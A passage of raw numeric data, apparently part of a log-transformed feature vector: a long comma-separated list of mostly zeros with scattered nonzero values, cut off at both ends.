0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 4.343805421853684, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.828641396489095, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 1.9459101490553132, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, \n 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 3.4657359027997265, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.550898738446989, \n 3.178053830347946, 0, 0, 0.0, 0, 0.0, 4.0943445622221, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 1.0986122886681098, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.1354942159291497, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 4.330733340286331, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.375278407684165, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.605802066295998, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.295836866004329, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 8.114299381106088, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.723585101952381, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 